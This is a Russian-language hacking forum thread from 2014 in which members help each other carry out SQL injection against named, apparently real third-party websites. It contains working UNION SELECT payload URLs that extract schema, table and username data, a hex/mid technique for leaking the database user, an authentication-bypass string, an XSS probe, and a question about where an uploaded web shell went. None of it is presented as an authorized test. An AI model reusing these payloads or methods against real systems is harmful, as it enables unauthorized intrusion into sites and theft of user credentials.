ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.01.2014, 01:08
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Спасибо ребятулечки, но там другая фигня получилась.
Код:
Code:
http://www.sevseun.com/downloads.php?page_id=-1075%27+union+select+1,2,3,4,Column_name,6,7,8,9,10,11,12,13,14,15,16+from+information_scheMa.columns+where+table_name=%27users%27+limit+2,1+--+
вообщем есть столбец username & password, но туда не пускает, мб зарегистрироваться надо. А насчёт скобок тоже отдельное спасибо, но можно поочередно вытянуть используя их.
II.
Код:
Code:
http://fmf.npi-tu.ru/index.php?id=3+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
- не выводит пентабельное поле. Зачем регистрироватся, если ты работаешь с БД ?
Table 'sevseun.users' doesn't exist
Нету прав у юзера на доступ к этой таблице.
|
|
|
23.01.2014, 01:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
Сообщение от kingbeef
kingbeef said:
Зачем регистрироватся, если ты работаешь с БД ?
Table 'sevseun.users' doesn't exist
Нету прав у юзера на доступ к этой таблице.
Просто у меня были такие случаи на практике, когда после регистрации получалось вытянуть.
|
|
|
|
23.01.2014, 02:23
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Просто у меня были такие случаи на практике, когда после регистрации получалось вытянуть.
Такого быть не может.
|
|
|
|
23.01.2014, 13:01
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от kingbeef
kingbeef said:
Зачем регистрироватся, если ты работаешь с БД ?
Table 'sevseun.users' doesn't exist
Нету прав у юзера на доступ к этой таблице.
Table 'sevseun.users' doesn't exist
Таблицы такой нет вообще, а не нет доступа.
|
|
|
|
23.01.2014, 13:53
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 23
Провел на форуме:
189651
Репутация:
-5
|
|
Подскажите пожалуйста по вопросу sql inj. Нашел уязвимую админку, хочу создать запрос для проникновения без пароля.
Есть 2 поля: Логин и Пароль
В поле username ввожу '1
В поле password ввожу '2
На что выдает мне:
DB Error: syntax error
SELECT NAME, PASSWORD FROM USER WHERE NAME = ''1' AND state = '0' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' AND state = '0'' at line 2]
Далее пробую вставить запрос такого вида в поле username
admin' or '1'='1' AND password='' or '1'='1'
На что выдает следующее:
DB Error: syntax error
SELECT NAME, PASSWORD FROM USER WHERE NAME = 'admin' or '1'='1' AND password='' or '1'='1'' AND state = '0' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0'' at line 2]
Как правильно составить запрос?
|
|
|
|
23.01.2014, 15:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
Возникло парочку вопросов:
1.
Код:
Code:
http://www.nova-plosha.com/index.php?hl=ru&idd=cat&cat=13955%27
- невозможно подобрать кол-во столбцов.
2. Есть место для заливки шелла, но когда заливаешь неизвестно где он пропадает..
Код:
Code:
http://kerch.biz/upload/
в категории archive; photos - не обнаружено.
3.
Код:
Code:
http://www.auto-alliance.org/item.php?id=6319+And+1=-0+union+select+version%28%29+--+
- не выводится пентабельное поле.
4.
Код:
Code:
http://fmf.npi-tu.ru/index.php?id=3+union+select+1,2,3,4,5,6,7,8,9,10,1 1+--+
- аналогично, не выводится пентабельное поле. |
|
|
|
23.01.2014, 16:26
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от попугай
попугай said:
Table 'sevseun.users' doesn't exist
Таблицы такой нет вообще, а не нет доступа.
Таблица есть. Из нее вытаскивались колонки.
|
|
|
|
23.01.2014, 17:15
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от kingbeef
kingbeef said:
Зачем регистрироватся, если ты работаешь с БД ?
Table 'sevseun.users' doesn't exist
Нету прав у юзера на доступ к этой таблице.
lolwut?
Почему ты утверждаешь, что к таблице нету доступа, когда ошибка говорит об отсутствии таблицы как таковой? MySQL шутник тот еще, шутки шутит, ага.
Таблица находится в другой БД, хакер.
Код:
Code:
http://www.sevseun.com/downloads.php?page_id=1075%27+and+0+union+select+1,2,3,4,TABLE_SCHEMA,6,7,8,9,10,11,12,13,14,15,16+from+information_scheMa.columns+where+table_name=%27users%27+limit+0,1--%20a
-- aukro
Код:
Code:
http://www.sevseun.com/downloads.php?page_id=1075%27+and+0+union+select+1,2,3,4,username,6,7,8,9,10,11,12,13,14,15,16+from+aukro.users--%20a
Сообщение от kingbeef
kingbeef said:
Таблица есть. Из нее вытаскивались колонки.
...
Сообщение от Unknowhacker
Unknowhacker said:
Просто у меня были такие случаи на практике, когда после регистрации получалось вытянуть.
Звучит крайне прохладно.
Unknowhacker, что такое "пентабельное поле"? Я могу понять не выговаривать букву "р", но не иметь возможности ее написать это что-то новенькое.
И по поводу http://www.auto-alliance.org/item.php?id=6319+And+1=-0+union+select+version%28%29+--+
Вывод там есть, в ошибке, что ниже. Но на вывод возможны только числовые значения, так еще и определенной длины.
Объяснять более подробно, что там происходит просто впадлу, да и бессмысленно =\
Код:
Code:
http://www.auto-alliance.org/item.php?id=6319%20and(0)%20UNION%20SELECT%20hex(mid(user(),1,2))--%20a
http://www.auto-alliance.org/item.php?id=6319%20and(0)%20UNION%20SELECT%20hex(mid(user(),3,2))--%20a
http://www.auto-alliance.org/item.php?id=6319%20and(0)%20UNION%20SELECT%20hex(mid(user(),5,2))--%20a
http://www.auto-alliance.org/item.php?id=6319%20and(0)%20UNION%20SELECT%20hex(mid(user(),7,2))--%20a
Инкриминируем это число на 2, пока не будет нуля и полученные значения записываем (полученные значения будут выводится тут Error loading image: /image2.php?id= [NUM]), потом полученный результат анхексаем и получаем заветные данные.
|
|
|
|
23.01.2014, 17:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
5283
Репутация:
0
|
|
Доброго времени суток. Есть сайт вида www.site.com/find.jsp?f= попробовал подставить
Код:
Code:
">alert('xss')
в исходнике
Код:
Code:
alert('xss')"/>
тег не закрылся. Тогда сделал так
Код:
Code:
">alert('xss')alert('xss')
, но заветного окошка я так и не увидел, что не так? |
|
|
|
23.01.2014, 17:39
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от nike001
nike001 said:
что не так?
Браузер
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
